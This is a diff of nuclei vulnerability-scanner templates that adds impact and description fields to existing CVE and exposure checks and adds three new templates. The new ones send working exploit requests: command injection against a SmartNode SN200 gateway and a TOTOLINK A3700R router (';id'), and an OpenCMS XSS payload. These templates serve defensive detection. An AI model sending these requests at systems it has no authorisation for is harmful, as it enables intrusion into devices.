-# digest: 4a0a0047304502206b3a2a3276203b3715b9bab38b72189226e6480de0c449725e6c41abaa4762b0022100c6eb5eb8517905cfc8ce8af39f57cd52da2a135d4be68ad0646775a9459e3638:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022038e1af900da5190ccc1302130ecf070c766dbb7257179f6f5d439e7c9d2ae3c70220415f65fa01ae36b229465c58ec4057e77acf23bfa43ba89d2b4d20831f83b7b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml
index 65b1f01274..fa455783dd 100644
--- a/http/cves/2023/CVE-2023-39600.yaml
+++ b/http/cves/2023/CVE-2023-39600.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   reference:
     - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
     - https://nvd.nist.gov/vuln/detail/CVE-2023-39600
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201bf6144a7a5621cbfa6eff1d496a1a3f72e9e13f5d97644b4995ad51d09bf92d022100e0b09f9658e037ba3c9456cc4baf07ff614c42d5047575789c9d06c40b58ee07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220425b92f2540016c5cde79f9098b75eb3e96e96a0ba02780ebf1949e3e9642aaa02206ec234497fbe6ada328442f69332edc98e9e8714d7fa8a064b9482fb81c15da1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml
index d3b841cfe6..ca1a14ae7c 100644
--- a/http/cves/2023/CVE-2023-39676.yaml
+++ b/http/cves/2023/CVE-2023-39676.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential theft of sensitive information, session hijacking, or defacement.
   reference:
     - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
     - https://sorcery.ie
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100eda31e3bbebbdc3ecb5e72c780be9441f2a8039d6f679e9dd5336ae5344f02f002210095e5d672c113b91adfc59e5d75e62227da5249923bbe338121c0f08b765a79e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203c6553397a0cdf3815e10bb68d28fea3bdc47c3c1db8337d8b8c742fc5202001022060d09037226ffc2d83f8f3e96a761452785cc264384c22bdb0a93176301e0eda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml
index afeb442764..eb45a8d275 100644
--- a/http/cves/2023/CVE-2023-39677.yaml
+++ b/http/cves/2023/CVE-2023-39677.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     PrestaShop modules by MyPrestaModules expose PHPInfo
+  impact: |
+    An attacker can exploit this vulnerability to obtain sensitive information about the server configuration, potentially leading to further attacks.
   reference:
     - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/
     - https://cve.report/CVE-2023-39677
@@ -52,4 +54,4 @@ http:
         group: 1
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
-# digest: 490a0046304402205aee581ca70de7e6dbb2aaccee1b3ba9c512be2621623b60b39c5f52b45085c602204841a558df7bd1eb8ef0d2e3d64d519e10d45cb7bcb3d050aa84fbaa3a1e8d84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220349c2def06ea877aca2978268801938a32152c435b2cd0d7c0fb71eb5408521e0220440d5db806f8f7402ec4cb6e51d95fbea385a0af6c9e439add33f1be3d54fcc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml
new file mode 100644
index 0000000000..c4a78d7374
--- /dev/null
+++ b/http/cves/2023/CVE-2023-41109.yaml
@@ -0,0 +1,48 @@
+id: CVE-2023-41109
+
+info:
+  name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
+  author: princechaddha
+  severity: critical
+  description: |
+    The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
+  remediation: |
+    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
+  reference: |
+    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-41109
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-41109
+    cwe-id: CWE-78
+    epss-score: 0.0009
+    epss-percentile: 0.37749
+    cpe: cpe:2.3:o:patton:smartnode_sn200_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: patton
+    product: smartnode_sn200_firmware
+  tags: cve,cve2023,smartnode,voip
+
+variables:
+  payload: "echo CVE-2023-41109 | md5sum"
+
+http:
+  - raw:
+      - |
+        POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: AuthToken=; AuthGroup=superuser; UserName=admin
+
+        {"cmd":"{{payload}}","arguments":[]}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "dd556350275e2ee0a2e877cea9c8a74a"
+# digest: 490a00463044022027fbef743a3162511f9d6d9814e8b456183b308ebff31ef264a25d3995cc07c20220548b348afe5fa2b25a8d77072b0f9baa2e4bcd20b95b5c7317c278ef550d33f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml
index b5daf0eb7f..5821ff93ee 100644
--- a/http/cves/2023/CVE-2023-4173.yaml
+++ b/http/cves/2023/CVE-2023-4173.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a newer version of mooSocial to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 490a0046304402203287a43fffab9c69580467dc46fd45fd4520dd7affc426a4c8dcb5c0b4e8e42c02205b27e50dc0af01bf107037b8a600719891902688e286562ca403fe2fda2100c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044021f438c2870d7378dfa1098b183f90225e60a8c16889007f1af42b059468e5c83022100c637a5ca8bf3c78d1505b3326964de42d8f627b2a37af3290cdf35e33d28091f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml
index 812b43ec92..5380d313e0 100644
--- a/http/cves/2023/CVE-2023-4174.yaml
+++ b/http/cves/2023/CVE-2023-4174.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4a0a00473045022037b2fe15d132b3292d4123e6761d9d9c7acf5bef291155a4852e2844f291bf430221008736242083a1ce8f02f8a96a5095072b9f4402965637ae19ef06bb18b6309baf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204486e61e5764f3d1a1fc49116f94efa47c0a2a1afaec5fc67ee687dcdf70e43f022035f25d3835d63b7fd4b7292287a0efa4a327cc8a5ecb95a1633f34f1a02efd3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml
index 1b81b75c8c..8d22b64e32 100644
--- a/http/cves/2023/CVE-2023-41892.yaml
+++ b/http/cves/2023/CVE-2023-41892.yaml
@@ -5,6 +5,8 @@ info:
   author: iamnoooob,rootxharsh,pdresearch
   severity: critical
   description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   reference:
     - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
     - https://blog.calif.io/p/craftcms-rce
@@ -45,4 +47,4 @@ http:
           - "CraftCMS"
         condition: and
         case-insensitive: true
-# digest: 4b0a00483046022100a9ce8db6573a7cbae793ffd429b37c22ca310b06d0397227930b380215b496fc02210084e188fcfa3ebcf4ddf0f14502abf32882d047a7c2b6f43eeae0a1ec632dce04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022045f6658d4a0a70491d62698cba81bca5b5af69bf0a8ea975b11fb6833b1016f1022100d4e3ab3d0b6e7dc934e40689a780af247b3f77894c5ef99a1f2baea0c8db9881:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml
new file mode 100644
index 0000000000..0dcff613b6
--- /dev/null
+++ b/http/cves/2023/CVE-2023-42343.yaml
@@ -0,0 +1,35 @@
+id: CVE-2023-42343
+
+info:
+  name: OpenCMS - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
+  remediation: Fixed in 10.5.1.
+  reference:
+    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
+  classification:
+    cve-id: CVE-2023-42343
+  metadata:
+    max-request: 1
+    shodan-query: "/opencms/"
+    verified: true
+  tags: cve,cve2023,xss,opencms
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
+    headers:
+      Content-Type: application/cmisquery+xml
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Apache Chemistry OpenCMIS'
+          - '<svg onload=alert(document.domain)>'
+        condition: and
+# digest: 4a0a00473045022059541a77f42a99970a9f0b5cc68fd577751fffab1e2c2350f636f6e445739f35022100afe449fd219a2ed7b76c45634f3eef7856e4b86c12459e9e002bb08364a2d9cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml
index f4d15cc007..e1cb888558 100644
--- a/http/cves/2023/CVE-2023-42442.yaml
+++ b/http/cves/2023/CVE-2023-42442.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).
+  impact: |
+    The vulnerability allows an attacker to gain sensitive information from the JumpServer application.
   reference:
     - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91
     - https://nvd.nist.gov/vuln/detail/CVE-2023-42442
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205abc521c5c682a46780b142ea3b79f4ba828e8ba178cf568b399081080d510c3022079b038875d24a9e322c67ad8827d10e28c0ea870894959fc40474db03c0a0ba1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100953747efde56fd8593e24bb1fae5b7dc3406879f347dbb26d473f18917887f25022100a8739e36323562bb02325f9b9cc36abbef620639f3da69a7fba11327bc9a849f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml
index c57247bffd..729b45025f 100644
--- a/http/cves/2023/CVE-2023-4568.yaml
+++ b/http/cves/2023/CVE-2023-4568.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
     - https://www.tenable.com/security/research/tra-2023-31
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210096aaad0b38e96fea6ad9e2746b0fa7b04a3f4da869b5e2c0b514b9048af52b02022044fd5f471d7d08fded547f563141b58b72b8a48e1e2331834f6cc91323f85454:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f4dc3f68618990c6dc1d25de4f55f14a37a02e9f12ae95008ec554a9d7d36164022100c785e8690aee2da778ead4ae40a7aa09bc50a366f62afb828e5af04dc3817cef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml
index 98eb9d160e..622c46cca9 100644
--- a/http/cves/2023/CVE-2023-4634.yaml
+++ b/http/cves/2023/CVE-2023-4634.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to local files.
   remediation: Fixed in version 3.09
   reference:
     - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
@@ -47,4 +49,4 @@ http:
         part: interactsh_protocol
         words:
           - "dns"
-# digest: 4a0a0047304502205320804c33d23a5b9194e86494c704c812ae2ed09df52b5b2ed0c184c85c2dc9022100f4684f07624c2525d973144a636832db778a183a5e9121c49a91fdf88e7155fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008be03c6c10f37cac17b955ecefade2e9943b528e129df393e935e26a7d910373022100b570c383172c7d4d1056049c6900f8ff88a111c18a96862bfe60e02be0c7828e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml
new file mode 100644
index 0000000000..7088380485
--- /dev/null
+++ b/http/cves/2023/CVE-2023-46574.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-46574
+
+info:
+  name: TOTOLINK A3700R - Command Injection
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-46574
+    - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-46574
+    cwe-id: CWE-77
+    epss-score: 0.00223
+    epss-percentile: 0.60602
+    cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"Totolink"
+    vendor: totolink
+    product: a3700r_firmware
+  tags: cve,cve2023,totolink,router,iot,rce
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<title>TOTOLINK</title>")'
+        condition: and
+
+  - raw:
+      - |
+        GET /cgi-bin/cstecgi.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        {"topicurl":"UploadFirmwareFile","FileName":";id"}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100f3b495dfdf9013fd352455e557179b61f26ea1a8b0681f19e7c5765f069fd411022100f74770687188358ff96bcf2b881c7ae1428a59ac92db8ee9398813263bef7b7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml
index b8c2bd8d3d..587bdcd371 100644
--- a/http/cves/2023/CVE-2023-4714.yaml
+++ b/http/cves/2023/CVE-2023-4714.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-4714
     - https://www.exploitalert.com/view-details.html?id=39826
@@ -49,4 +51,4 @@ http:
         part: body
         regex:
           - 'key: "([a-z_A-Z0-9]+)"'
-# digest: 490a004630440220562b4320e12d4a96b314fb67b0dcb3845d719ed3cedecf2f3b2570121538245d022041fd7198bbbb302bc82e05d1cdf1778b98dbe5f73f627d36de9d528c19f685ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a0371e97b1c6c4e0332ea0975bf22129b404b2178f508fd4805e15855df90162022024be5e8400250d84178af17b224db2baa7ac5345dae331e760b1e1e504480315:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/blazor-boot.yaml b/http/exposures/configs/blazor-boot.yaml
index 53b64262c8..27fab21730 100644
--- a/http/exposures/configs/blazor-boot.yaml
+++ b/http/exposures/configs/blazor-boot.yaml
@@ -4,6 +4,7 @@ info:
   name: Blazor Boot File Disclosure
   author: freakyclown
   severity: info
+  description: Exposed Blazor Boot (a web framework developed by Microsoft) config file.
   reference:
     - https://github.com/freakyclown/Nuclei_templates/blob/main/blazor_server.yaml
   metadata:
@@ -29,5 +30,4 @@ http:
         part: body
         regex:
           - \"([^"\r\n]+\.dll)\"
-
-# digest: 4b0a00483046022100dc61a96aca50c31f4dadd2e148a6245daada0e5b4f7720964e8393a4ed6ff4a3022100fe89b94e9bb50ef7c4d0c952ab9c38e60c45b17d93552e7d181d4901bdd05a03:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022039ffcef0ae5c9c5a543cb8e0910d761626d3debadead0fd0d661630121fb20aa02210087543ab10d47871b9ef1c195d617d232116fb319394dbef356011481f17c0662:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/collibra-properties.yaml b/http/exposures/configs/collibra-properties.yaml
index d24168fbc9..c3a9717e76 100644
--- a/http/exposures/configs/collibra-properties.yaml
+++ b/http/exposures/configs/collibra-properties.yaml
@@ -4,6 +4,7 @@ info:
   name: Collibra Properties Exposure
   author: 0xPugazh
   severity: high
+  description: Detected exposed Collibra Properties.
   reference:
     - https://twitter.com/shaybt12/status/1662431219223605254
   metadata:
@@ -47,5 +48,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100c89d8430cc6bd466aa9b1e21488f6286d3f38b729e0df44761b758bd07692eeb02203eada1c05de929a6288b5099d7d1bc950de05a482c00c06e84be8beac5e0957f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100aabe7605269656cd0e3e1dd02648f738d66a3f5f94de735a4188151bfcfd128d02200f6dfc0a20b0a04690c6b2d23780c5b9fceae13a25bf37ef8a7d46ee3c87c358:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/config-properties.yaml b/http/exposures/configs/config-properties.yaml
index b5dd23c891..e192a8ba0c 100644
--- a/http/exposures/configs/config-properties.yaml
+++ b/http/exposures/configs/config-properties.yaml
@@ -4,6 +4,7 @@ info:
   name: Config Properties Exposure
   author: j4vaovo,DhiyaneshDK
   severity: high
+  description: Config Properties were exposed.
   reference:
     - https://twitter.com/win3zz/status/1657624974851702784/photo/1
   metadata:
@@ -45,5 +46,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a004730450221009d35cc0f153d9d08be92b7bc3ef1efc26849cd32242b54dfdcd4665a321e604302202764b9df23f568d3f8ee7367800c9128cf5daffb696701f453379453d1a4e6e6:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022008273068defa1ae064f6e2ed7e5479496a02fa435bc9fed465571576ce4d69a1022043c9be145fa9b0e9b0c824b6888abf6206d6a5c06c2243b402cf9230110de83d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/github-workflows-disclosure.yaml b/http/exposures/configs/github-workflows-disclosure.yaml
index 6c10dfc9e6..a5b5467f2f 100644
--- a/http/exposures/configs/github-workflows-disclosure.yaml
+++ b/http/exposures/configs/github-workflows-disclosure.yaml
@@ -4,6 +4,7 @@ info:
   name: Github Workflow Disclosure
   author: dhiyaneshDk,geeknik
   severity: medium
+  description: Github Workflow was exposed.
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/github-workflows-disclosure.json
   metadata:
@@ -55,5 +56,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100b3ef62cf01e55282edda5ca920c5052bf7660d21c0dfe9a898226bce90f379be02206a691e6a31e4d9ffeca54c5cd541c841c95cab23f0c019fa72537e286103af11:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e56df88054a45c73d5b15d61d3086ab4ed3f3fa0de22d3b48a35082287261a96022100d409551a0f0bfb018fdefc89d3eacbdd87f2ccfe512ba252435d994fcb48ff7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml
index c3a1f4b740..ea44a8a352 100644
--- a/http/exposures/configs/jkstatus-manager.yaml
+++ b/http/exposures/configs/jkstatus-manager.yaml
@@ -4,6 +4,8 @@ info:
   name: JK Status Manager - Detect
   author: pdteam,DhiyaneshDk
   severity: low
+  description: |
+    Exposed JKStatus manager which is a web-based tool that allows administrators to monitor and manage the connections between the Apache HTTP Server and the Tomcat application server.
   reference:
     - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JKStatus.java
   metadata:
@@ -32,5 +34,4 @@ http:
       - type: word
         words:
           - "JK Status Manager"
-
-# digest: 4b0a00483046022100fb9a49e044929222a0a7bf7e45d32dc24c142324f769a1d53e1c7d698dd834ea022100bd3066f986a2ae6536450a05092b8164e0c0d241af46bfafbecdf12c3f709900:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/jsconfig-json.yaml b/http/exposures/configs/jsconfig-json.yaml
index e42be668f6..dcaa555271 100644
--- a/http/exposures/configs/jsconfig-json.yaml
+++ b/http/exposures/configs/jsconfig-json.yaml
@@ -4,6 +4,7 @@ info:
   name: Visual Studio Code jsconfig.json - Detect
   author: DhiyaneshDk
   severity: info
+  description: Visual Studio Code jsconfig.json was detected.
   reference:
     - https://code.visualstudio.com/docs/languages/jsconfig
   metadata:
@@ -34,5 +35,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100c0f0fae2aa24db0c4798d3f08a7c0c3b306097f05ec94790173571eb82f276fc0221008535afca24875455b230259e6a32b5091579a7332a038163d5ab16e82a4759ab:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f3bdc1bae693c4c3ed822edd3585c0f3257e9845a7df1ea8bf706d609e9569cf022100e08c6223c96b9c85a391851593728e6567f069fdb77d4d7119b0eb6980487026:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/phinx-config.yaml b/http/exposures/configs/phinx-config.yaml
index 0aae5a3e20..e8db986a58 100644
--- a/http/exposures/configs/phinx-config.yaml
+++ b/http/exposures/configs/phinx-config.yaml
@@ -4,6 +4,7 @@ info:
   name: Phinx Configuration Exposure
   author: DhiyaneshDk
   severity: medium
+  description: Phinx configuration file was exposed.
   reference:
     - https://book.cakephp.org/phinx/0/en/configuration.html
     - https://github.com/cakephp/phinx
@@ -33,5 +34,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022013d72ca531849ffa27bee5457914cf1dfcee951495529d8d98bbbac22670391d022016f8615b830e6e549fe1dcb869367e344989c2d8741e37217bf8917d7514e32b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220755f5e2ccb86cfda5f8669d6051fe333574dd231a446536c4a49cc2d2c62a2ef022100f40d98a64ec736cb3b50bdcd02a43a08cb71c054a353da2297a06799a74cf89f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/wpconfig-aws-keys.yaml b/http/exposures/configs/wpconfig-aws-keys.yaml
index b8ff924077..4f08ed14bc 100644
--- a/http/exposures/configs/wpconfig-aws-keys.yaml
+++ b/http/exposures/configs/wpconfig-aws-keys.yaml
@@ -4,6 +4,7 @@ info:
   name: AWS S3 keys Leak
   author: r12w4n
   severity: high
+  description: AWS S3 keys are exposed.
   metadata:
     max-request: 2
   tags: aws,s3,wordpress,disclosure,exposure
@@ -23,5 +24,4 @@ http:
           - 'DB_PASSWORD'
         condition: and
         part: body
-
-# digest: 490a0046304402205c58bf53aaaf3f49b1f70d58a83ade6c86d06e5fb72c76722b796cad49ae3fd6022039477955cf230c067640fea875264effc6c75a1b3c6ac1bbab387349845a97f5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d4dec0861fd92d1f5e06459a7e0655d7d2b0db44988b7c87ee1bd87a0a34caf302202920734592b3a2a3d1e03e0ab7b539aab4ac9b8c922b3c45f46449b605c3d950:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/yii-debugger.yaml b/http/exposures/configs/yii-debugger.yaml
index 7af4907268..3be4aca083 100644
--- a/http/exposures/configs/yii-debugger.yaml
+++ b/http/exposures/configs/yii-debugger.yaml
@@ -4,6 +4,7 @@ info:
   name: View Yii Debugger Information
   author: geeknik,rumble773
   severity: low
+  description: Detects potential exposure to Yii Debugger information.
   reference:
     - https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
   metadata:
@@ -42,5 +43,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100e1682d7422ec720680e27e58b7358e785a7791f3e898e7c8f5eaa93d6369b8a2022100f2d05e060804cad0820bbe1b62b2a181c8940165beb42503a9d085a0bfc1d6bc:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/configs/zend-config-file.yaml b/http/exposures/configs/zend-config-file.yaml
index adb7b0be67..6b01a46e63 100644
--- a/http/exposures/configs/zend-config-file.yaml
+++ b/http/exposures/configs/zend-config-file.yaml
@@ -4,6 +4,7 @@ info:
   name: Zend Configuration File
   author: pdteam,geeknik,Akokonunes
   severity: high
+  description: Zend configuration file was exposed.
   metadata:
     max-request: 13
   tags: config,exposure,zend,php
@@ -43,5 +44,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100818b5226d3793bcee715a51fe5421187123c9450277b33cd13c1b98a34fb2728022100972405673ca58a61d2de08a52a503e8c51752030325f66f11977baa42b8c6ce7:922c64590222798bb761d5b6d8e72950
